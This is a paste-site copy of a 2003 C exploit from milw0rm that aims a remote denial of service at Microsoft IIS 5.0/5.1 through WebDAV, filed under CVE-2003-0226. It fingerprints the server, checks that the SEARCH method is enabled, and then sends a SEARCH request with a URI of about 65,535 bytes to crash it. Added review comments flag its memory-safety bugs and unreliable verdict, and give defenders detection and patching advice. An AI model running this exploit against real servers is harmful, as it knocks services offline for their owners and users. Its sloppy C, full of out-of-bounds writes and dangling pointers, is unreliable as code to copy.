FlyFar

Microsoft IIS 5.0 < 5.1 - Remote Denial of Service - CVE-2003-0226

Jan 24th, 2024
  1. /*
  2.  
  3. Microsoft IIS versions 5.0 and 5.1 remote denial of service exploit
  4.  
  5. that makes use of the vulnerability recently published by SPI dynamics
  6.  
  7. Published on 31.05.2003
  8.  
  9. */
  10.  
  11. #include <windows.h>
  12. #include <winsock.h>
  13. #include <stdio.h>
  14.  
  15. #pragma comment (lib,"ws2_32")
  16.  
  17. void graphitte()
      /* Prints the tool's fixed banner (title and author credit) to stdout.
       * Takes no input and returns nothing; main() calls it once at start-up. */
  18.  
  19. {printf("\n********************************** ");
  20. printf("\n   Webdav MICROSOFT IIS DoS Exploit     * \n");
  21. printf("+++++++++++++++++++++++++++++++*\n");
  22. printf(" by Shachank Pandrey                                *\n");
  23. printf("*************************************\n");
  24.  
  25. }
  26.  
  27. char *funk(char tobesent[100],char *host)
      /*
       * Probe helper: sends one request string to TCP port 80 of `host` and
       * reads up to 100 bytes of the reply. main() uses it twice, first to look
       * for the "IIS/5.0" banner and then to see how the server answers a bare
       * SEARCH request.
       *
       * tobesent: request text; it is copied through "%s" into a 100-byte local.
       * host:     name or address handed to gethostbyname().
       * Returns 0 when Winsock start-up or name resolution fails, otherwise the
       * address of the local array `got`.
       *
       * NOTE(review): `got` is an automatic array, so the pointer returned on the
       * success path is dangling as soon as the function returns; the strstr()
       * calls in main() that read it have undefined behaviour, which makes the
       * fingerprinting result untrustworthy.
       */
  28. {
  29. int s; char got[100];
  30.  
  31. WSADATA wsaData;
  32.  
  33. struct hostent *yo;
  34. struct sockaddr_in heck;
  35.  
  36. char lala[100];
  37.  
  38.  
  39. if(WSAStartup(0x0101,&wsaData)!=0) {
  40. printf("error starting winsock..");
  41. return 0;
  42. }
  43.  
  44. if ((yo = gethostbyname(host))==0){
  45. printf("error: can't resolve '%s'",host);
  46. return 0;
  47. }
  48.  
  49.  
      /* Destination is always port 80 over IPv4; the first resolved address is used. */
  50. heck.sin_port = htons(80);
  51. heck.sin_family = AF_INET;
  52. heck.sin_addr = *((struct in_addr *)yo->h_addr);
  53.  
      /* NOTE(review): a socket() or connect() failure is only printed; execution
       * falls through and send()/recv() are still called on the bad socket. */
  54. if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  55. printf("Error: Unable to create socket");
  56.  
  57. }
  58.  
  59.  
  60. if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
  61. printf("Error: Cudn't Connect\r\n");
  62.  
  63. }
  64.  
  65. memset(lala,0,sizeof(lala));
  66.  
      /* NOTE(review): the format has a single "%s", so the trailing
       * sizeof(tobesent) argument is ignored (and, tobesent being a parameter,
       * it would be the size of a pointer). Nothing bounds the copy into lala[100]. */
  67. sprintf(lala,"%s",tobesent,sizeof(tobesent));
  68.  
      /* NOTE(review): neither return value is checked, and recv() may fill all
       * 100 bytes of `got` without leaving a NUL terminator. */
  69. send(s,lala,strlen(lala),0);
  70. recv(s,got,100,0);
  71.  
  72. return got;
      /* Unreachable: everything below follows the return, so the socket is never
       * closed and WSACleanup() is never called from this function. */
  73. closesocket(s);
  74. WSACleanup();
  75. printf("done.\n");
  76.  
  77. }
  78.  
  79.  
  80. int main(int argc, char *argv[])
      /*
       * Entry point. Takes a host name or IP address in argv[1] and works in
       * three stages:
       *   1. requests "/" through funk() and looks for "IIS/5.0" in the reply;
       *   2. sends a bare SEARCH request and treats "HTTP/1.1 411 Length
       *      Required" as evidence that the WebDAV SEARCH method is enabled;
       *   3. sends one SEARCH request whose URI is padded from a 65535-byte
       *      buffer of 'S' characters, followed by a small DAV: searchrequest
       *      XML body, then reads the reply to print a verdict.
       *
       * Defender's view: on the wire this is a "GET /" and a body-less SEARCH
       * from one client, followed by a SEARCH whose request line is tens of
       * kilobytes long, far beyond any legitimate URL. Alerting on WebDAV
       * methods with oversized URIs, applying the vendor fix for the CVE named
       * in the page title, disabling WebDAV where it is not needed, and capping
       * the accepted URL length in front of the server all address this request.
       *
       * NOTE(review): the listing has several memory-safety defects of its own
       * (marked inline below), so both its behaviour and its printed verdict are
       * unreliable; it should not be used as a patch-status check.
       * Returns 1 on most paths, including normal completion, and 0 when
       * WSAStartup() fails.
       */
  81. {
  82.  
  83. WSADATA wsaData;
  84.  
  85. int s;char mysend[100];
  86. char *gotme;
  87. char trash[100];
  88.  
  89.  
  90. struct hostent *yo;
  91. struct sockaddr_in heck;
  92. char buffer[65535] ="";
  93. char myrequest[80000];
      /* Fixed XML body sent after the SEARCH headers; its length becomes the
       * Content-Length value. */
  94. char content[] =
  95. "<?xml version=\"1.0\"?>\r\n"
  96. "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  97. "<g:sql>\r\n"
  98. "Select \"DAV:displayname\" from scope()\r\n"
  99. "</g:sql>\r\n"
  100. "</g:searchrequest>\r\n";
  101.  
  102.  
  103.  
  104. graphitte();
  105.  
  106. if(WSAStartup(0x0101,&wsaData)!=0) {
  107. printf("Error :Cudn't initiate winsock!");
  108. return 0;
  109. }
  110.  
      /* Usage check happens after WSAStartup(); this exit path skips WSACleanup(). */
  111. if(argc<2)
  112.  
  113. {printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]);
  114. exit(0);}
  115.  
  116. if ( (yo = gethostbyname(argv[1]))==0)
  117. {
  118. printf("error: can't resolve '%s'",argv[1]);
  119. return 1;
  120. }
  121.  
      /* Stage 1: banner check. NOTE(review): funk() returns 0 on failure and
       * otherwise a pointer to its own local array, so the strstr() calls on
       * gotme below are undefined behaviour in either case. */
  122. printf("\nChecking web server %s\n",argv[1]);
  123. gotme=(char *)funk("GET / HTTP/1.0\r\n\n",argv[1]);
  124.  
  125.  
  126. if (strstr(gotme,"IIS/5.0") == NULL)
  127.  
  128. { printf("\n\r----> %s is not running IIS 5.0! adios !\n",argv[1]); }
  129.  
  130.  
  131. else
  132.  
  133. {
  134.  
  135. printf("\n\r----> Aww rite! IIS 5.0 found on %s !\n",argv[1]);
  136.  
      /* Stage 2: SEARCH sent with no body. The extra argument 40 has no
       * matching conversion in the format string and is ignored. */
  137. sprintf(mysend,"SEARCH / HTTP/1.0\r\n\n",40);
  138.  
  139. gotme=(char *)funk(mysend,argv[1]);
  140.  
  141. if (strstr(gotme,"HTTP/1.1 411 Length Required") != NULL)
  142.  
  143. { printf("\n\r----> METHOD SEARCH ALLOWED\r\n"); }
  144.  
  145.  
  146. else
  147.  
  148. {
  149.  
  150. printf("\n----> Method SEARCH not Allowed ! adios...\n");
  151. exit(0);
  152.  
  153. }
  154.  
      /* Stage 3: a separate connection to port 80 of the address resolved above. */
  155. heck.sin_port = htons(80);
  156. heck.sin_family = AF_INET;
  157. heck.sin_addr = *((struct in_addr *)yo->h_addr);
  158.  
  159. if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  160. printf("error: can't create socket");
  161. return 1;
  162. }
  163.  
  164.  
  165. if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
  166. printf("Error:Cudn't Connect\r\n");
  167. return 1;
  168. }
  169.  
      /* NOTE(review): index sizeof(buffer) is one element past the end of the
       * array, so this store is out of bounds. */
  170. buffer[sizeof(buffer)]=0x00;
  171.  
      /* NOTE(review): the memset fills every byte of buffer with 'S', leaving no
       * NUL terminator inside the array for the "%s" conversion below. */
  172. memset(buffer,'S',sizeof(buffer));
  173. memset(myrequest,0,sizeof(myrequest));
  174. memset(trash,0,sizeof(trash));
  175. sprintf(myrequest,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\
  176. nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
      /* NOTE(review): myrequest is both the destination and a "%s" source here
       * (overlapping objects, undefined behaviour), and strlen() returns size_t
       * while the conversion is "%d". */
  177. sprintf(myrequest,"%s%d\r\n\r\n",myrequest,strlen(content));
  178. printf("\r\nDoSsing the server...<pray>\n");
  179. send(s,myrequest,strlen(myrequest),0);
  180.  
  181. send(s,content,strlen(content),0);
  182.  
      /* Verdict: trash was zeroed earlier, so trash[0]==0 just means recv()
       * stored nothing. NOTE(review): recv()'s return value is not checked, so a
       * reset, an error, or a dropped connection produces the same verdict as an
       * unresponsive server; the printed result is not a reliable indicator. */
  183. recv(s,trash,sizeof(trash),0);
  184. if(trash[0]==0x00)
  185. {
  186. printf("Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n");
  187.  
  188. }
  189. else
  190.  
  191. printf("Server is prolly patched.\r\n");
  192.  
  193. closesocket(s);
  194.  
  195.  
  196. }
  197.  
  198. WSACleanup();
  199.  
  200. return 1;
  201. }
  202.  
  203. // milw0rm.com [2003-05-31]
  204.            